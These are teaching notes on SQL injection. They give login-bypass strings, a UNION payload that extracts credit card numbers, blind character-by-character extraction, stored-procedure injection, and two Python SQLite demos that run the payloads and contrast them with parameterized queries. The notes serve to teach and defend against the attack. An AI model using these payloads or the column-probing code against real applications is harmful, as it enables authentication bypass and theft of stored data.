Example 1:
SELECT * FROM users WHERE username='$username' AND password='$password'
Test data:
$username = 1' or '1'='1
$password = 1' or '1'='1
Resulting statement:
SELECT * FROM users WHERE username='1' or '1'='1' AND password='1' or '1'='1'
If the parameters are passed to the server with the GET method, the request is:
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1
The attacker's final '1 has no closing quote because the application's own quote completes it. Since AND binds tighter than OR, the WHERE clause reads username='1' OR ('1'='1' AND password='1') OR '1'='1'; the last '1'='1' is always true, so every row matches and neither the username nor the password is actually verified.
Example 2:
SELECT * FROM users WHERE ((username='$username') AND (password=md5('$password')))
Test data:
$username = 1' or '1'='1'))/*
$password = foo
Resulting statement:
SELECT * FROM users WHERE ((username='1' or '1'='1'))/*') AND (password=md5('foo')))
URL request:
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo
The two injected closing parentheses balance the ones the application opened, and /* starts a comment that runs to the end of the statement, so the password check is never evaluated. (On MySQL, "-- " with a trailing space or "#" work the same way.)
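The following is an added example, not part of the original notes: it runs Example 2's login query against an in-memory SQLite database, first built by string interpolation (the same pattern as Example 5's EXEC of a concatenated @sqlstring) and then with bound parameters. The users table, the row alice/s3cret and the registered md5() function are assumptions constructed for the demo; SQLite has no built-in MD5, so one is registered so the page's query runs as written.

```python
import hashlib
import sqlite3


def make_db():
    # Constructed sample schema and row for this example (not from the original notes).
    conn = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so Example 2's query text runs unchanged.
    conn.create_function("md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', ?)",
                 (hashlib.md5(b"s3cret").hexdigest(),))
    return conn


def login_vulnerable(conn, username, password):
    # Example 2's query built with string formatting: the user input becomes part of
    # the SQL text, so quotes, parentheses and /* are interpreted by the parser.
    sql = ("SELECT * FROM users WHERE ((username='%s') AND (password=md5('%s')))"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    # Same query with placeholders: the driver sends the values separately from the
    # SQL text, so the payload is compared as a literal string and never parsed.
    sql = "SELECT * FROM users WHERE ((username=?) AND (password=md5(?)))"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    conn = make_db()
    payload = "1' or '1'='1'))/*"          # Example 2's $username test data
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "s3cret"),
        "legit_parameterized": login_parameterized(conn, "alice", "s3cret"),
        "bypass_vulnerable": login_vulnerable(conn, payload, "foo"),
        "bypass_parameterized": login_parameterized(conn, payload, "foo"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(name, ok)
```

Both functions accept the real credentials; only the interpolated version also accepts the payload with an arbitrary password, because the injected "))" closes the application's parentheses and "/*" comments out the md5() comparison.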
Example 3:
SELECT name, phone, address FROM users WHERE id=$id
Test data:
$id = 1 UNION ALL SELECT creditcardnumber, 1, 1 FROM creditcardtable
Resulting statement:
SELECT name, phone, address FROM users WHERE id=1 UNION ALL SELECT creditcardnumber, 1, 1 FROM creditcardtable
Because $id is interpolated without quotes, there is no quote to break out of. The second SELECT must return the same number of columns as the first (three here), so the attacker pads it with constants; the card numbers then appear in the name column of the ordinary result page.
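Added example (not from the original notes) for Example 3: the UNION ALL payload run against Example 3's query in SQLite, plus the usual preliminary step the text leaves implicit, probing how many columns the original SELECT has by adding NULLs until the UNION stops erroring. The users and creditcardtable contents are constructed sample data; the hardened lookup casts $id to an integer before binding it, which is an assumed fix, not something the notes prescribe.

```python
import sqlite3


def make_db():
    # Constructed sample data; table and column names follow Example 3.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, phone TEXT, address TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', '555-0100', '1 Main St')")
    conn.execute("CREATE TABLE creditcardtable (creditcardnumber TEXT)")
    conn.execute("INSERT INTO creditcardtable VALUES ('4111111111111111')")
    return conn


def lookup_vulnerable(conn, id_param):
    # $id interpolated unquoted, exactly as in Example 3.
    sql = "SELECT name, phone, address FROM users WHERE id=%s" % id_param
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, id_param):
    # Assumed fix: enforce the expected type (an id is an integer) and bind it.
    id_value = int(id_param)            # ValueError on "1 UNION ALL ..." payloads
    sql = "SELECT name, phone, address FROM users WHERE id=?"
    return conn.execute(sql, (id_value,)).fetchall()


def find_column_count(conn, max_cols=10):
    # UNION only succeeds when both SELECTs have the same column count, so the
    # first probe that does not raise tells the attacker how many to pad to.
    for n in range(1, max_cols + 1):
        probe = "1 UNION ALL SELECT " + ",".join(["NULL"] * n)
        try:
            lookup_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def demo():
    conn = make_db()
    payload = "1 UNION ALL SELECT creditcardnumber, 1, 1 FROM creditcardtable"
    rows = lookup_vulnerable(conn, payload)
    try:
        lookup_fixed(conn, payload)
        blocked = False
    except ValueError:
        blocked = True
    return rows, blocked


if __name__ == "__main__":
    print("columns:", find_column_count(make_db()))
    rows, blocked = demo()
    print("rows:", rows)
    print("fixed lookup rejected payload:", blocked)
```

The vulnerable lookup returns alice's row followed by a row whose name column holds the card number; the typed, parameterized lookup rejects the payload before any SQL runs.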
Example 4:
Blind SQL injection. Suppose the page takes a parameter named id and the attacker sends:
http://www.example.com/index.php?id=1'
Assume the server-side query is:
SELECT field1, field2, field3 FROM users WHERE id='$id'
Functions for reading a value one character at a time:
SUBSTRING(text, start, length), ASCII(char), LENGTH(text)
Set id to:
$id = 1' and ASCII(SUBSTRING(username,1,1))=97 and '1'='1
Resulting statement:
SELECT field1, field2, field3 FROM users WHERE id='1' and ASCII(SUBSTRING(username,1,1))=97 and '1'='1'
If the ASCII code of the first character of username is 97 ('a'), the condition is true and the page responds exactly as it does for id=1; otherwise the response differs (an empty page or an error), and the attacker tries 98, 99, and so on. Once the first character is known, the same is done for SUBSTRING(username,2,1), with LENGTH(username) telling the attacker when to stop. Nothing from the database is displayed directly; every character is inferred from the true/false difference in the response.
Example 5:
Stored procedure injection
A stored procedure that builds its query by string concatenation and executes it dynamically is just as injectable as application code that does so:
CREATE PROCEDURE user_login
    @username varchar(20),
    @password varchar(20)
AS
DECLARE @sqlstring varchar(250)
SET @sqlstring = 'SELECT 1 FROM users WHERE username=''' + @username + ''' AND password=''' + @password + ''''
EXEC(@sqlstring)
GO
Test data:
@username = anyusername' or 1=1 --
@password = anypassword
Statement executed by EXEC:
SELECT 1 FROM users WHERE username='anyusername' or 1=1 --' AND password='anypassword'
If the input is not validated, 1=1 is always true and the -- comments out the password check, so the statement returns a row and the login succeeds. The fix is not to build SQL from strings at all: compare the parameters in a static query inside the procedure, or pass them as parameters to sp_executesql, instead of calling EXEC on a concatenated string.
SQL injection: common statements (notes)